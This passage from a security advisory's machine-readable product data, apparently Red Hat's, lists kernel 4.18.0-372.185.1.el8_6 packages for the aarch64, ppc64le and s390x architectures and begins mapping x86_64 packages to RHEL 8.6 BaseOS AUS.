                  "product_id": "bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/bpftool-debuginfo@4.18.0-372.185.1.el8_6?arch=aarch64"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
                "product": {
                  "name": "kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
                  "product_id": "kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/kernel-debug-debuginfo@4.18.0-372.185.1.el8_6?arch=aarch64"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "kernel-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
                "product": {
                  "name": "kernel-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
                  "product_id": "kernel-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/kernel-debuginfo@4.18.0-372.185.1.el8_6?arch=aarch64"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "kernel-debuginfo-common-aarch64-0:4.18.0-372.185.1.el8_6.aarch64",
                "product": {
                  "name": "kernel-debuginfo-common-aarch64-0:4.18.0-372.185.1.el8_6.aarch64",
                  "product_id": "kernel-debuginfo-common-aarch64-0:4.18.0-372.185.1.el8_6.aarch64",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/kernel-debuginfo-common-aarch64@4.18.0-372.185.1.el8_6?arch=aarch64"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
                "product": {
                  "name": "kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
                  "product_id": "kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/kernel-tools-debuginfo@4.18.0-372.185.1.el8_6?arch=aarch64"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "perf-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
                "product": {
                  "name": "perf-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
                  "product_id": "perf-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/perf-debuginfo@4.18.0-372.185.1.el8_6?arch=aarch64"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
                "product": {
                  "name": "python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
                  "product_id": "python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/python3-perf-debuginfo@4.18.0-372.185.1.el8_6?arch=aarch64"
                  }
                }
              }
            ],
            "category": "architecture",
            "name": "aarch64"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "bpftool-0:4.18.0-372.185.1.el8_6.ppc64le",
                "product": {
                  "name": "bpftool-0:4.18.0-372.185.1.el8_6.ppc64le",
                  "product_id": "bpftool-0:4.18.0-372.185.1.el8_6.ppc64le",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/bpftool@4.18.0-372.185.1.el8_6?arch=ppc64le"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "kernel-0:4.18.0-372.185.1.el8_6.ppc64le",
                "product": {
                  "name": "kernel-0:4.18.0-372.185.1.el8_6.ppc64le",
                  "product_id": "kernel-0:4.18.0-372.185.1.el8_6.ppc64le",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/kernel@4.18.0-372.185.1.el8_6?arch=ppc64le"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "kernel-core-0:4.18.0-372.185.1.el8_6.ppc64le",
                "product": {
                  "name": "kernel-core-0:4.18.0-372.185.1.el8_6.ppc64le",
                  "product_id": "kernel-core-0:4.18.0-372.185.1.el8_6.ppc64le",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/kernel-core@4.18.0-372.185.1.el8_6?arch=ppc64le"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "kernel-debug-0:4.18.0-372.185.1.el8_6.ppc64le",
                "product": {
                  "name": "kernel-debug-0:4.18.0-372.185.1.el8_6.ppc64le",
                  "product_id": "kernel-debug-0:4.18.0-372.185.1.el8_6.ppc64le",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/kernel-debug@4.18.0-372.185.1.el8_6?arch=ppc64le"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "kernel-debug-core-0:4.18.0-372.185.1.el8_6.ppc64le",
                "product": {
                  "name": "kernel-debug-core-0:4.18.0-372.185.1.el8_6.ppc64le",
                  "product_id": "kernel-debug-core-0:4.18.0-372.185.1.el8_6.ppc64le",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/kernel-debug-core@4.18.0-372.185.1.el8_6?arch=ppc64le"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "kernel-debug-devel-0:4.18.0-372.185.1.el8_6.ppc64le",
                "product": {
                  "name": "kernel-debug-devel-0:4.18.0-372.185.1.el8_6.ppc64le",
                  "product_id": "kernel-debug-devel-0:4.18.0-372.185.1.el8_6.ppc64le",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/kernel-debug-devel@4.18.0-372.185.1.el8_6?arch=ppc64le"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "kernel-debug-modules-0:4.18.0-372.185.1.el8_6.ppc64le",
                "product": {
                  "name": "kernel-debug-modules-0:4.18.0-372.185.1.el8_6.ppc64le",
                  "product_id": "kernel-debug-modules-0:4.18.0-372.185.1.el8_6.ppc64le",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/kernel-debug-modules@4.18.0-372.185.1.el8_6?arch=ppc64le"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.ppc64le",
                "product": {
                  "name": "kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.ppc64le",
                  "product_id": "kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.ppc64le",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/kernel-debug-modules-extra@4.18.0-372.185.1.el8_6?arch=ppc64le"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "kernel-devel-0:4.18.0-372.185.1.el8_6.ppc64le",
                "product": {
                  "name": "kernel-devel-0:4.18.0-372.185.1.el8_6.ppc64le",
                  "product_id": "kernel-devel-0:4.18.0-372.185.1.el8_6.ppc64le",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/kernel-devel@4.18.0-372.185.1.el8_6?arch=ppc64le"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "kernel-modules-0:4.18.0-372.185.1.el8_6.ppc64le",
                "product": {
                  "name": "kernel-modules-0:4.18.0-372.185.1.el8_6.ppc64le",
                  "product_id": "kernel-modules-0:4.18.0-372.185.1.el8_6.ppc64le",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/kernel-modules@4.18.0-372.185.1.el8_6?arch=ppc64le"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "kernel-modules-extra-0:4.18.0-372.185.1.el8_6.ppc64le",
                "product": {
                  "name": "kernel-modules-extra-0:4.18.0-372.185.1.el8_6.ppc64le",
                  "product_id": "kernel-modules-extra-0:4.18.0-372.185.1.el8_6.ppc64le",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/kernel-modules-extra@4.18.0-372.185.1.el8_6?arch=ppc64le"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "kernel-tools-0:4.18.0-372.185.1.el8_6.ppc64le",
                "product": {
                  "name": "kernel-tools-0:4.18.0-372.185.1.el8_6.ppc64le",
                  "product_id": "kernel-tools-0:4.18.0-372.185.1.el8_6.ppc64le",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/kernel-tools@4.18.0-372.185.1.el8_6?arch=ppc64le"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "kernel-tools-libs-0:4.18.0-372.185.1.el8_6.ppc64le",
                "product": {
                  "name": "kernel-tools-libs-0:4.18.0-372.185.1.el8_6.ppc64le",
                  "product_id": "kernel-tools-libs-0:4.18.0-372.185.1.el8_6.ppc64le",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/kernel-tools-libs@4.18.0-372.185.1.el8_6?arch=ppc64le"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "perf-0:4.18.0-372.185.1.el8_6.ppc64le",
                "product": {
                  "name": "perf-0:4.18.0-372.185.1.el8_6.ppc64le",
                  "product_id": "perf-0:4.18.0-372.185.1.el8_6.ppc64le",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/perf@4.18.0-372.185.1.el8_6?arch=ppc64le"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "python3-perf-0:4.18.0-372.185.1.el8_6.ppc64le",
                "product": {
                  "name": "python3-perf-0:4.18.0-372.185.1.el8_6.ppc64le",
                  "product_id": "python3-perf-0:4.18.0-372.185.1.el8_6.ppc64le",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/python3-perf@4.18.0-372.185.1.el8_6?arch=ppc64le"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
                "product": {
                  "name": "bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
                  "product_id": "bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/bpftool-debuginfo@4.18.0-372.185.1.el8_6?arch=ppc64le"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
                "product": {
                  "name": "kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
                  "product_id": "kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/kernel-debug-debuginfo@4.18.0-372.185.1.el8_6?arch=ppc64le"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "kernel-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
                "product": {
                  "name": "kernel-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
                  "product_id": "kernel-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/kernel-debuginfo@4.18.0-372.185.1.el8_6?arch=ppc64le"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "kernel-debuginfo-common-ppc64le-0:4.18.0-372.185.1.el8_6.ppc64le",
                "product": {
                  "name": "kernel-debuginfo-common-ppc64le-0:4.18.0-372.185.1.el8_6.ppc64le",
                  "product_id": "kernel-debuginfo-common-ppc64le-0:4.18.0-372.185.1.el8_6.ppc64le",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/kernel-debuginfo-common-ppc64le@4.18.0-372.185.1.el8_6?arch=ppc64le"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
                "product": {
                  "name": "kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
                  "product_id": "kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/kernel-tools-debuginfo@4.18.0-372.185.1.el8_6?arch=ppc64le"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "perf-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
                "product": {
                  "name": "perf-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
                  "product_id": "perf-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/perf-debuginfo@4.18.0-372.185.1.el8_6?arch=ppc64le"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
                "product": {
                  "name": "python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
                  "product_id": "python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/python3-perf-debuginfo@4.18.0-372.185.1.el8_6?arch=ppc64le"
                  }
                }
              }
            ],
            "category": "architecture",
            "name": "ppc64le"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "bpftool-0:4.18.0-372.185.1.el8_6.s390x",
                "product": {
                  "name": "bpftool-0:4.18.0-372.185.1.el8_6.s390x",
                  "product_id": "bpftool-0:4.18.0-372.185.1.el8_6.s390x",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/bpftool@4.18.0-372.185.1.el8_6?arch=s390x"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "kernel-0:4.18.0-372.185.1.el8_6.s390x",
                "product": {
                  "name": "kernel-0:4.18.0-372.185.1.el8_6.s390x",
                  "product_id": "kernel-0:4.18.0-372.185.1.el8_6.s390x",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/kernel@4.18.0-372.185.1.el8_6?arch=s390x"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "kernel-core-0:4.18.0-372.185.1.el8_6.s390x",
                "product": {
                  "name": "kernel-core-0:4.18.0-372.185.1.el8_6.s390x",
                  "product_id": "kernel-core-0:4.18.0-372.185.1.el8_6.s390x",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/kernel-core@4.18.0-372.185.1.el8_6?arch=s390x"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "kernel-debug-0:4.18.0-372.185.1.el8_6.s390x",
                "product": {
                  "name": "kernel-debug-0:4.18.0-372.185.1.el8_6.s390x",
                  "product_id": "kernel-debug-0:4.18.0-372.185.1.el8_6.s390x",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/kernel-debug@4.18.0-372.185.1.el8_6?arch=s390x"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "kernel-debug-core-0:4.18.0-372.185.1.el8_6.s390x",
                "product": {
                  "name": "kernel-debug-core-0:4.18.0-372.185.1.el8_6.s390x",
                  "product_id": "kernel-debug-core-0:4.18.0-372.185.1.el8_6.s390x",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/kernel-debug-core@4.18.0-372.185.1.el8_6?arch=s390x"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "kernel-debug-devel-0:4.18.0-372.185.1.el8_6.s390x",
                "product": {
                  "name": "kernel-debug-devel-0:4.18.0-372.185.1.el8_6.s390x",
                  "product_id": "kernel-debug-devel-0:4.18.0-372.185.1.el8_6.s390x",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/kernel-debug-devel@4.18.0-372.185.1.el8_6?arch=s390x"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "kernel-debug-modules-0:4.18.0-372.185.1.el8_6.s390x",
                "product": {
                  "name": "kernel-debug-modules-0:4.18.0-372.185.1.el8_6.s390x",
                  "product_id": "kernel-debug-modules-0:4.18.0-372.185.1.el8_6.s390x",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/kernel-debug-modules@4.18.0-372.185.1.el8_6?arch=s390x"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.s390x",
                "product": {
                  "name": "kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.s390x",
                  "product_id": "kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.s390x",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/kernel-debug-modules-extra@4.18.0-372.185.1.el8_6?arch=s390x"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "kernel-devel-0:4.18.0-372.185.1.el8_6.s390x",
                "product": {
                  "name": "kernel-devel-0:4.18.0-372.185.1.el8_6.s390x",
                  "product_id": "kernel-devel-0:4.18.0-372.185.1.el8_6.s390x",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/kernel-devel@4.18.0-372.185.1.el8_6?arch=s390x"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "kernel-modules-0:4.18.0-372.185.1.el8_6.s390x",
                "product": {
                  "name": "kernel-modules-0:4.18.0-372.185.1.el8_6.s390x",
                  "product_id": "kernel-modules-0:4.18.0-372.185.1.el8_6.s390x",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/kernel-modules@4.18.0-372.185.1.el8_6?arch=s390x"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "kernel-modules-extra-0:4.18.0-372.185.1.el8_6.s390x",
                "product": {
                  "name": "kernel-modules-extra-0:4.18.0-372.185.1.el8_6.s390x",
                  "product_id": "kernel-modules-extra-0:4.18.0-372.185.1.el8_6.s390x",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/kernel-modules-extra@4.18.0-372.185.1.el8_6?arch=s390x"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "kernel-tools-0:4.18.0-372.185.1.el8_6.s390x",
                "product": {
                  "name": "kernel-tools-0:4.18.0-372.185.1.el8_6.s390x",
                  "product_id": "kernel-tools-0:4.18.0-372.185.1.el8_6.s390x",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/kernel-tools@4.18.0-372.185.1.el8_6?arch=s390x"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "kernel-zfcpdump-0:4.18.0-372.185.1.el8_6.s390x",
                "product": {
                  "name": "kernel-zfcpdump-0:4.18.0-372.185.1.el8_6.s390x",
                  "product_id": "kernel-zfcpdump-0:4.18.0-372.185.1.el8_6.s390x",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/kernel-zfcpdump@4.18.0-372.185.1.el8_6?arch=s390x"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "kernel-zfcpdump-core-0:4.18.0-372.185.1.el8_6.s390x",
                "product": {
                  "name": "kernel-zfcpdump-core-0:4.18.0-372.185.1.el8_6.s390x",
                  "product_id": "kernel-zfcpdump-core-0:4.18.0-372.185.1.el8_6.s390x",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/kernel-zfcpdump-core@4.18.0-372.185.1.el8_6?arch=s390x"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "kernel-zfcpdump-devel-0:4.18.0-372.185.1.el8_6.s390x",
                "product": {
                  "name": "kernel-zfcpdump-devel-0:4.18.0-372.185.1.el8_6.s390x",
                  "product_id": "kernel-zfcpdump-devel-0:4.18.0-372.185.1.el8_6.s390x",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/kernel-zfcpdump-devel@4.18.0-372.185.1.el8_6?arch=s390x"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "kernel-zfcpdump-modules-0:4.18.0-372.185.1.el8_6.s390x",
                "product": {
                  "name": "kernel-zfcpdump-modules-0:4.18.0-372.185.1.el8_6.s390x",
                  "product_id": "kernel-zfcpdump-modules-0:4.18.0-372.185.1.el8_6.s390x",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/kernel-zfcpdump-modules@4.18.0-372.185.1.el8_6?arch=s390x"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "kernel-zfcpdump-modules-extra-0:4.18.0-372.185.1.el8_6.s390x",
                "product": {
                  "name": "kernel-zfcpdump-modules-extra-0:4.18.0-372.185.1.el8_6.s390x",
                  "product_id": "kernel-zfcpdump-modules-extra-0:4.18.0-372.185.1.el8_6.s390x",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/kernel-zfcpdump-modules-extra@4.18.0-372.185.1.el8_6?arch=s390x"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "perf-0:4.18.0-372.185.1.el8_6.s390x",
                "product": {
                  "name": "perf-0:4.18.0-372.185.1.el8_6.s390x",
                  "product_id": "perf-0:4.18.0-372.185.1.el8_6.s390x",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/perf@4.18.0-372.185.1.el8_6?arch=s390x"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "python3-perf-0:4.18.0-372.185.1.el8_6.s390x",
                "product": {
                  "name": "python3-perf-0:4.18.0-372.185.1.el8_6.s390x",
                  "product_id": "python3-perf-0:4.18.0-372.185.1.el8_6.s390x",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/python3-perf@4.18.0-372.185.1.el8_6?arch=s390x"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
                "product": {
                  "name": "bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
                  "product_id": "bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/bpftool-debuginfo@4.18.0-372.185.1.el8_6?arch=s390x"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
                "product": {
                  "name": "kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
                  "product_id": "kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/kernel-debug-debuginfo@4.18.0-372.185.1.el8_6?arch=s390x"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "kernel-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
                "product": {
                  "name": "kernel-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
                  "product_id": "kernel-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/kernel-debuginfo@4.18.0-372.185.1.el8_6?arch=s390x"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "kernel-debuginfo-common-s390x-0:4.18.0-372.185.1.el8_6.s390x",
                "product": {
                  "name": "kernel-debuginfo-common-s390x-0:4.18.0-372.185.1.el8_6.s390x",
                  "product_id": "kernel-debuginfo-common-s390x-0:4.18.0-372.185.1.el8_6.s390x",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/kernel-debuginfo-common-s390x@4.18.0-372.185.1.el8_6?arch=s390x"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
                "product": {
                  "name": "kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
                  "product_id": "kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/kernel-tools-debuginfo@4.18.0-372.185.1.el8_6?arch=s390x"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "kernel-zfcpdump-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
                "product": {
                  "name": "kernel-zfcpdump-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
                  "product_id": "kernel-zfcpdump-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/kernel-zfcpdump-debuginfo@4.18.0-372.185.1.el8_6?arch=s390x"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "perf-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
                "product": {
                  "name": "perf-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
                  "product_id": "perf-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/perf-debuginfo@4.18.0-372.185.1.el8_6?arch=s390x"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
                "product": {
                  "name": "python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
                  "product_id": "python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/python3-perf-debuginfo@4.18.0-372.185.1.el8_6?arch=s390x"
                  }
                }
              }
            ],
            "category": "architecture",
            "name": "s390x"
          }
        ],
        "category": "vendor",
        "name": "Red Hat"
      }
    ],
    "relationships": [
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "bpftool-0:4.18.0-372.185.1.el8_6.x86_64 as a component of Red Hat Enterprise Linux BaseOS AUS (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.AUS:bpftool-0:4.18.0-372.185.1.el8_6.x86_64"
        },
        "product_reference": "bpftool-0:4.18.0-372.185.1.el8_6.x86_64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.AUS"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64 as a component of Red Hat Enterprise Linux BaseOS AUS (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.AUS:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64"
        },
        "product_reference": "bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.AUS"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-0:4.18.0-372.185.1.el8_6.src as a component of Red Hat Enterprise Linux BaseOS AUS (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.AUS:kernel-0:4.18.0-372.185.1.el8_6.src"
        },
        "product_reference": "kernel-0:4.18.0-372.185.1.el8_6.src",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.AUS"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-0:4.18.0-372.185.1.el8_6.x86_64 as a component of Red Hat Enterprise Linux BaseOS AUS (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.AUS:kernel-0:4.18.0-372.185.1.el8_6.x86_64"
        },
        "product_reference": "kernel-0:4.18.0-372.185.1.el8_6.x86_64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.AUS"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-abi-stablelists-0:4.18.0-372.185.1.el8_6.noarch as a component of Red Hat Enterprise Linux BaseOS AUS (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.AUS:kernel-abi-stablelists-0:4.18.0-372.185.1.el8_6.noarch"
        },
        "product_reference": "kernel-abi-stablelists-0:4.18.0-372.185.1.el8_6.noarch",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.AUS"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-core-0:4.18.0-372.185.1.el8_6.x86_64 as a component of Red Hat Enterprise Linux BaseOS AUS (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.AUS:kernel-core-0:4.18.0-372.185.1.el8_6.x86_64"
        },
        "product_reference": "kernel-core-0:4.18.0-372.185.1.el8_6.x86_64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.AUS"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-debug-0:4.18.0-372.185.1.el8_6.x86_64 as a component of Red Hat Enterprise Linux BaseOS AUS (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.AUS:kernel-debug-0:4.18.0-372.185.1.el8_6.x86_64"
        },
        "product_reference": "kernel-debug-0:4.18.0-372.185.1.el8_6.x86_64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.AUS"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-debug-core-0:4.18.0-372.185.1.el8_6.x86_64 as a component of Red Hat Enterprise Linux BaseOS AUS (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.AUS:kernel-debug-core-0:4.18.0-372.185.1.el8_6.x86_64"
        },
        "product_reference": "kernel-debug-core-0:4.18.0-372.185.1.el8_6.x86_64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.AUS"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64 as a component of Red Hat Enterprise Linux BaseOS AUS (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.AUS:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64"
        },
        "product_reference": "kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.AUS"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-debug-devel-0:4.18.0-372.185.1.el8_6.x86_64 as a component of Red Hat Enterprise Linux BaseOS AUS (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.AUS:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.x86_64"
        },
        "product_reference": "kernel-debug-devel-0:4.18.0-372.185.1.el8_6.x86_64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.AUS"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-debug-modules-0:4.18.0-372.185.1.el8_6.x86_64 as a component of Red Hat Enterprise Linux BaseOS AUS (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.AUS:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.x86_64"
        },
        "product_reference": "kernel-debug-modules-0:4.18.0-372.185.1.el8_6.x86_64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.AUS"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
